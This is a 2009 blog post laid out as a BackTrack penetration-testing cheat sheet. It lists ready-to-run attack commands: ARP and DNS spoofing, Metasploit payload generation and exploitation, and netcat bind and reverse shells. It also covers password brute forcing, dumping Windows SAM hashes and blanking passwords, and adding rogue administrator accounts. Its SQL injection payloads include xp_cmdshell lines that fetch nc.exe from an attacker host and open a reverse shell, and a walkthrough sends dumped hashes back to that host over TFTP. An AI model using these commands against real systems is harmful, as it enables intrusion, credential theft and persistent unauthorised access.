Friday, September 25, 2009

A complete project report on backtrack

Table of Contents:

I. Networking

II. Services

III. Basics

IV. Foot printing

V. Scanning

VI. Windows Enumeration

VII. ARP Spoofing

VIII. Exploits

IX. Metasploit
What to do after gaining a remote shell

X. TFTP

XI. Netcat

XII. Passwords

XIII. Physical Access

XIV. SQL Injection

XV. Alternate Data Streams

XVI. A White Hat’s Pen Test

Networking:

dhcpcd :get a new IP address

Renew dynamic IP address:

dhcpcd -k :release IP address

ifconfig eth0 up :bring up the NIC

dhcpcd :get a new IP address

Static IP address:

ifconfig eth0 192.168.0.100/24 :set IP address & sub net mask

route add default gw 192.168.0.1 :set default gateway

echo nameserver 192.168.0.1 > /etc/resolv.conf :set DNS server

Backtrack 4 config:

/etc/init.d/networking start :get a new ip address

/etc/init.d/wicd start :start wireless adapter

Services:

Apache server:

apachectl start start server on TCP port 80

apachectl stop stop server

SSH server:

sshd-generate generate ssh keys

/usr/sbin/sshd start server on TCP port 22

pkill sshd stop server

ssh user@targetIP

TFTP server:

atftpd --daemon --port 69 /tmp/ start server on UDP port 69 with a root directory of tmp

pkill tftpd stop server

VNC server:

Vncserver start server on TCP port 5901

pkill Xvnc stop server

Check what ports are listening:

netstat –ant show listening TCP ports

netstat –anu show listening UDP ports

netstat -ant | grep 22 verify ssh has started

netstat -anu | grep 69 verify tftp has started

Basics:

Mount a local hard drive:

mount /dev/hda1 /mnt/hda1

ls -l /mnt/hda1

Mount a Windows network share:

share

share admin 10.1.1.2 c$

Enter a password for the remote share.

ls -l /mnt/share/
umount /mnt/share
umount share

Edit a file:

nano test.sh create a new file and open it

x exit

Y save modified buffer

write changes

chmod 755 test.sh make the file executable

./test.sh run the file

Compile a program:

gcc -o newname exploit.c

gcc -o dcom 66.c

./dcom

Install a new program:

tar zxvf program.tar.gz

cd to the new program folder method 2: bzip2 -cd program.tar.bz2 | tar xvf -

./configure

make

su root

make install

Footprinting:

Whois:

whois target.com contact info, emails, dates, name servers

ping www.target.com IP address of web server

whois targetIP network range

DNS:

dig target.com any

A

PTR Host maps a domain to an IP address

NS Pointer maps an IP address to a domain

SOA name Server server name for a delegated zone

SRV start of authority zone transfer and record caching

MX service locator used to locate services in the network

host -l target.com zone transfer

Scanning:

scanrand -b10M targetIP:quick

nmap:

-sS TCP SYN scan or Stealth, half open (default)

-sT TCP full connect (very noisy)

-sU UDP scan

-PS SYN packet discovery (best against stateful firewalls)

-PA ACK packet discovery (best against stateless firewalls)

-PN don't ping

-n no reverse DNS lookup

-A combines -O and -sV

-O OS fingerprinting

-sV service version (banner)

-p ports to scan (T:port,U:port)

-T timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane

-iL input list of hosts to scan

-oG grepable output to a file

nmap -sS -PN -n targetIP

nmap -sU -PN -n targetIP

nmap -sT -PN -n targetIP -A -p open ports -T5 -oG scan.txt

nmap -sS -p 135,139,445 targetIP

nmap -sS -p T:1433,U:1434 targetIP

amap:

Take the results from nmap and check for services on uncommon ports.

amap -i scan.txt

OS Fingerprinting:

p0f -i eth0 -U –p use interface eth0, don’t display unknown signatures, promiscuous

point a browser to the targetIP read traffic on p0f

xprobe2 targetIP

Banner Grabbing:

nc targetIP port check if the port is open

nc 10.1.1.2 80

telnet targetIP port telnet may yield slightly different results

HEAD /HTTP/1.0



wget targetIP
downloads the index.html file

cat index.html | more view file one page at a time, space bar for next page

q exit file

Windows Enumeration:

nmap -sS -p 139,445 targetIP

cd /pentest/enumeration/smb-enum

nbtscan -f targetIP check to see if NetBIOS is enabled
smbgetserverinfo -i targetIP
name, OS and workgroup

smbdumpusers -i targetIP list users
smbclient -L //targetIP
list shares

Using Windows

net use \\targetIP\ipc$ "" /u:"" start a NULL session

net view \\targetIP view shares

smbclient:

smbclient -L hostName -I targetIP enumerate shares

smbclient -L hostName/share -U "" connect to open share with a blank user name

smbclient -L hostName -I targetIP -U admin connect to open share with user name admin

rpcclient:

rpcclient targetIP -U “” start a NULL session

netshareenum enumerate shares

enumdomusers enumerate users

lsaenumsid enumerate domain SIDs

queryuser RID user info, try 500, 501, 1000, 1001

createdomuser create user account

ARP Spoofing:

ettercap:

nano /usr/local/etc/etter.conf

Under the Linux section, uncomment both lines under iptables.

Sniff > Unified sniffing > Network interface: eth0 > OK

Hosts > Scan for hosts (do this two times)

Hosts > Hosts list

Select the default gateway > Add to Target 1

Select the target > Add to Target 2

Mitm > Arp poisoning > Sniff remote connections > OK

Start > Start sniffing

dsniff -i eth0

urlsnarf -i eth0

msgsnarf -i eth0

driftnet -i eth0

dns spoofing:

nano /usr/local/share/ettercap/etter.dns

Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof

Mitm > Arp poisoning > Sniff remote connections > OK

Start > Start sniffing

Exploits:

cd /pentest/exploits/milw0rm

cat sploitlist.txt | grep -i [exploit]

Some exploits may be written for compilation under Windows, while others for Linux.

You can identify the environment by inspecting the headers.

cat exploit | grep "#include"

Windows: process.h, string.h, winbase.h, windows.h, winsock2.h

Linux: arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave only Linux based exploits:

cat sploitlist.txt | grep -i exploit | cut -d " " -f1 | xargs grep sys | cut -d ":" -f1 | sort -u

Metasploit:

svn update update framework

Web Interface:

./msfweb open a browser to 127.0.0.1:55555

Console:

./msfconsole

help

show encoders,nops,exploits,payloads.auxillary

search

use

show options

set set RHOST 192.168.1.3

show payloads

set PAYLOAD
show options

set set LHOST 192.168.1.2

show targets

set TARGET set TARGET 0

exploit

Interactive sessions:

sessions –l list active sessions

sessions -i sessions -i 4, interact with session 4

sessions -k sessions -k 4, kill session 4

z background a session

c kill a session

Jobs list exploit jobs running

jobs –K kill all jobs

Auxiliary scanners:

show auxiliary

use

set

run

scanner/discovery/sweep_udp

scanner/smb/version

scanner/mssql/mssql_ping

scanner/mssql/mssql_login

Payloads:

Attacker behind firewall: bind shell

Target behind firewall: reverse shell

Meterpreter

Automated:

db_import_nessus_nbe import Nessus results in NBE format

db_import_nmap_xml import nmap results in XML format (-oX)

cd /pentest/exploit/framework3

./msfconsole

load db_sqlite3

db_destroy pentest delete old database called pentest

db_create pentest create a new database call pentest

db_nmap targetIP run nmap through the framework and store results in database

db_hosts show hosts discovered

db_services show services running on each host

db_autopwn show options

db_autopwn -t -p –e select modules based on open ports, show matching exploits, exploit

Command Line Interface:
./msfcli | grep -i
search for an exploit or auxiliary

./msfcli S summary info

./msfcli

Payload generator:

./msfpayload

S summary and options of payload

C C language

P Perl

y Ruby

R Raw, allows payload to be piped into msfencode and other tools

J JavaScript

X Windows executable

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

./msfpayload windows/meterpreter/reverse_tcp LHOST=10.1.1.1 LPORT=4444 X > evil.exe

Encode shellcode:

./msfencode

Pipe the output of msfpayload into msfencode, show bad characters and list available encoders.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder and format the output to C.

./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c

What to do after gaining a remote shell:

Hostname name of computer

net users list users

net user x hack /add add user "x" with password "hack"

net user x /add add user "x" with NO password

net localgroup list security groups

net localgroup administrators list users in Administrators group

net localgroup administrators x /add add user "x" to Administrators group

Don't use interactive programs like FTP from a remote shell

TFTP:

attack box 10.1.1.2

cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box

tftp -i 10.1.1.2 GET nc.exe

TFTP copies files with read only attributes. So to delete the file:

attrib -r nc.exe

del nc.exe

Netcat:

attacker: 10.1.1.1

target: 10.1.1.2

Port scanner:
nc -v -z 10.1.1.2 1-1024
scan ports 1 to 1024

Chat session:

target: nc -lvp 4444 start Netcat and listen verbosely on port 4444

attacker: nc -v 10.1.1.2 4444

Transfer file to target:

target: nc -lvp 4444 > output.txt

attacker: nc -v 10.1.1.2 4444 <>

Bind shell:

target: nc -lvp 4444 -e cmd.exe should be sitting at a command prompt of the target

attacker: nc -v 10.1.1.2 4444

Reverse shell:

target: nc -lvp 4444

attacker: nc -v 10.1.1.2 4444 -e /bin/bash

The target should be sitting at an invisible command prompt of the attacker.

You will not see a prompt. Issue any linux command to verify.

Passwords:

Word list:

zcat /pentest/password/dictionaries/wordlist.txt.Z > words

cat words | wc -l

About 306,000 passwords.

Brute force:

ftp with a user name ftp

hydra -l ftp -P words -v targetIP ftp

pop3 with a user name muts

hydra -l muts -P words -v targetIP pop3

snmp

hydra -P words -v targetIP snmp

Microsoft VPN

nmap -p 1723 targetIP

dos2unix words

cat words | thc-pptp-bruter targetIP

WYD:

Use wget to download specific files.

wget -r www.target.com --accept=pdf -f switch will read pwdump files

wyd.pl -o output.txt www.target.com/

cat output.txt | more

SAM file:

%SYSTEMROOT%/system32/config

%SYSTEMROOT%/repair backup copy not locked by the OS

Dumping hashes:

./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E

meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\

meterpreter > execute -f cmd -c

meterpreter > interact x Where x is Channel created

C:\WINDOWS\system32> pwdump \\127.0.0.1

John the Ripper:

Paste the hashes into a new file.

nano hash.txt

Delete unneeded accounts.

cp hash.txt /pentest/password/john-1.7.2/run/

cd /pentest/password/john-1.7.2/run/

./john hash.txt

Rainbow Tables:

rcrack *.rt -f hash.txt

Physical Access:

Mount a NTFS share in read/write mode:

Boot your box with Backtrack.

mount

umount /mnt/hda1

modprobe fuse

ntfsmount /dev/hda1 /mnt/hda1

mount

ls -l /mnt/hda1

Dump the SAM file:

bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt

samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt

cat hash.txt

Modify SAM file directly:

chntpw /mnt/sda1/WINDOWS/system32/config/SAM

Blank the password. *

Do you really wish to change it? y

Write hive files? y

unmount /mnt/sda1

reboot

SQL Injection:

nmap -sS -p 1521 targetIP oracle

nmap -sS -p T:1433,U:1434 targetIP ms sql

Release Version of SqlServer.exe

SQL Server 2000 RTM 2000.80.194.0

SQL Server 2000 SP1 2000.80.384.0

SQL Server 2000 SP2 2000.80.534.0

SQL Server 2000 SP3 2000.80.760.0

SQL Server 2000 SP3a 2000.80.760.0

SQL Server 2000 SP4 2000.80.00.2039

SQL Server 2005 RTM 2005.90.1399

SQL Server 2005 SP1 2005.90.2047

SQL Server 2005 SP2 2005.90.3042

Authentication bypass:

' or 1=1-- minus minus closes the SQL query, everything after it is ignored

Enumerating table names:

' having 1=1--

' group by table having 1=1--

' group by table, table2 having 1=1--

' group by table, table2, table3 having 1=1--

Enumerating column types:

union select sum(column) from table --

union select sum(column2) from table --

Adding data:

' ; insert into table values('value','value2','value3')--

MS SQL stored procedure:

Output the database info into an html file, that you can view with a browser.

' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --

www.target.com/test.html

Run ipconfig on target and write to a file, that you can view with a browser.

' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--

www.target.com/test.txt

Upload netcat and spawn a reverse shell.

' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --

attacker: nc -lvp 53

Alternate Data Streams:

Hide netcat inside a text file. Note netcat must be located in the current directory.

echo "This is a test" > test.txt

type nc.exe > test.txt:nc.exe

del nc.exe

start ./test.txt:nc.exe

A White Hat's Pen Test by Muts:

nslookup

set type=ns

set type=mx

nmap -sS

nmap -sU

nc -v target.com 23

snmpenum

Solarwinds

tftp the router config file

Use a perl script to decrypt the passwords

Find internal mail server in config file.

nc -n internalserver.com 80

Edit config file to open more port on the router, 135,139,445,1000

Use Metasploit to send RPC exploit

tftp -i attackIP GET pwdump4.exe

pwdump4.exe \\127.0.0.1>hashes.txt

tftp -i attackIP PUT hashes.txt

Crack hashes with rainbow table.

Use Remote Desktop to connect to server

No comments:

Post a Comment